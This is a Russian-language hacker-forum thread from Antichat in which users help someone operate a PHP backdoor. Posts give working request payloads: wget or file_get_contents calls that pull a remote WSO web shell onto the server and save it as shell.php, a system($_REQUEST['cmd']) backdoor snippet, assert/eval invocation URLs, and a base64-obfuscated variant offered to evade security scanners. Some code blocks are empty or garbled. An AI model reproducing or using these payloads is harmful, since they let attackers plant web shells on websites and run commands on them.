Форум АНТИЧАТ - Бэкдор php - загрузка файла

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - Бэкдор php - загрузка файла (https://forum.antichat.xyz/showthread.php?t=428162)

skaska

25.07.2015 09:11

тестирую на своем сервере, на site.ru/ в файл, index.php (или в любой др файл читаемый в браузере) прописываю это бэкдор:

PHP код:


		
			
[COLOR="#000000"][CODE][COLOR="#0000BB"]
[/COLOR][/CODE][/COLOR]

не ругайте сильно - учусь... что мне нужно ввести в адресной строке, чтоб загрузить файл на сервер? вариант без использования куков, т е простой вариант есть? знаю, нужно исполнить команду: можно через eval,

типа site.ru/index.php?f=eval.......????

подскажите что ввести в адресной строке для загрузки файла на сервер именно для этого бэкдора, буду каждому благодарен!

grimnir

25.07.2015 11:06

.php?param1=eval&param2=wget http://site.com/wso.txt -O shell.php

как-то так,возможно вместо eval надо будет писать exec,system и т.д ,использовать кодирование,вместо wget curl

b3	25.07.2015 12:19

Код можно очень сильно сократить

skaska

25.07.2015 12:21

команда рабочая, спасибо... но работает не всегда, из 5 серверов на один загрузило удачно! на остальные выдает это

Код HTML:

Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name in /var/www/u2847619/data/www/adgstroy.ru/index.php on line 3

OK

иногда пишет ОК, по факту на серваке пусто.

права нужные (в загружаемой категории уже лежит рабочий шелл), вариации перебрал exec,system и вместо wget curl... в чем может быть загвоздка?

skaska

25.07.2015 12:24

Цитата:

Сообщение от b3

↑
Код можно очень сильно сократить

да можно знаю, иногда получается с таким вариантом:

Код:

http://site.ru/cashe.php?cmd=$url = "http://ышеу2.ru/data/shell.txt";$content = file_get_contents($url);$h = fopen("shell.php","w");$text = "$content";fwrite($h,$text);fclose($h);

опять же в меньше половины случаев(

b3	25.07.2015 12:30

Я имел другое ввиду, ваш код из первого поста можно сократить значительно, а использование eval прям в коде это паливо жестокое

faza02

25.07.2015 12:43

wget это системная функция, eval-то при чем?

b3	25.07.2015 12:49

Цитата:

Сообщение от None

Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name

Наверное потому что eval не явлется функцией, а там хз не буду утверждать 100%

koro	25.07.2015 12:51

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]])){ [/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"cmd"[/COLOR][COLOR="#007700"]]); echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]); echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]; die; }[/COLOR][/COLOR]

b3	25.07.2015 12:57

еще один хакер... давайте глупости писать не будем может?

koro	25.07.2015 13:01

Цитата:

Сообщение от b3

↑
еще один хакер... давайте глупости писать не будем может?

а нафига велосипед изобретать

koro	25.07.2015 13:05

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#DD0000"]"data:text/plain;base64,base64_encode([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'c'])"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

b3	25.07.2015 13:32

Цитата:

Сообщение от koro

↑
а нафига велосипед изобретать

Может велосипед нужен для того чтоб обойти сканеры безопасности?

skaska

25.07.2015 18:09

поклон всем за ответы... опытным путем выявил, что самым рабочим вариантов является этот

Код:

но он и самый палевый! вопрос, можно ли его абфусцировать с сохранением работоспособности, если да - меняется ли кодировка запроса?

сейчас запрос таков:

Код:

http://site.ru/index.php?cmd=$url = "http://site2.ru/text.txt";$content = file_get_contents($url);$h = fopen("text.php","w");$text = "$content";fwrite($h,$text);fclose($h);

grimnir

25.07.2015 18:15

Цитата:

Сообщение от skaska

↑
поклон всем за ответы... опытным путем выявил, что самым рабочим вариантов является этот

Код:

http://site.ru/index.php?cmd=$url = "http://site2.ru/text.txt";$content = file_get_contents($url);$h = fopen("text.php","w");$text = "$content";fwrite($h,$text);fclose($h);

Код:

http://site.ru/index.php?cmd=base64_decode('JHVybCA9ICJodHRwOi8vc2l0ZTIucnUvdGV4dC50eHQiOyRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7JGg9Zm9wZW4oInRleHQucGhwIiwidyIpOyR0ZXh0ID0gIiRjb250ZW50Ijtmd3JpdGUoJGgsJHRleHQpO2ZjbG9zZSgkaCk7');

Кодировать тут http://securityxploded.com/online-base64-encoder.php

Еще вот посмотри

http://habrahabr.ru/post/215139

http://habrahabr.ru/post/215817/

skaska

25.07.2015 19:42

Цитата:

Сообщение от grimnir

↑

Код:

http://site.ru/index.php?cmd=base64_decode('JHVybCA9ICJodHRwOi8vc2l0ZTIucnUvdGV4dC50eHQiOyRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7JGg9Zm9wZW4oInRleHQucGhwIiwidyIpOyR0ZXh0ID0gIiRjb250ZW50Ijtmd3JpdGUoJGgsJHRleHQpO2ZjbG9zZSgkaCk7');

Кодировать тут
http://securityxploded.com/online-base64-encoder.php
Еще вот посмотри
http://habrahabr.ru/post/215139
http://habrahabr.ru/post/215817/

спасибо за ссылки, ответ на свой вопрос там не нашел... в соседней ветки нашел что можно абфуцировать так

Код:

но зачем он это сделал я не понял, ведь функция eval как говориться наружу бархатом осталась.. смысл было это делать..

интересует конкретно вопрос: можно ли обфусцировать всю строку без потери работоспособности и меняется ли при этом кодировка в запросе?

Ch3ck

25.07.2015 20:01

Б3, запости им свой зиродей

skaska

25.07.2015 20:17

разобрался ребята, за назойливость прошу простить

для меня лучший варик это:

Код:



file.php?f=assert&c=phpinfo();

file.php?f=eval&c=echo 1;

проверил работает! дальше больше...

и еще, eval часто не срабатывает - заменяем на exec или system и радуемся. Выше хороший человек подсказал: спасибо ему второй раз!

b3	25.07.2015 21:25

eval работает всегда а вот как раз таки system часто отключен, уверен на 100% передаешь в eval невалидный код вот и облом

VY_CMa

26.07.2015 00:30

traceme

28.07.2015 20:54

Вставляю этот скрипт для аплоада при использовании eval($_GET[cmd]);

Код:

Done ==> $userfile_name";

}

}

else

{

echo'

';

}

?>

hAv3n1c3DaY

29.07.2015 01:01

Код:

tmpqhtwe.php //название этого скрипта

Время: 21:10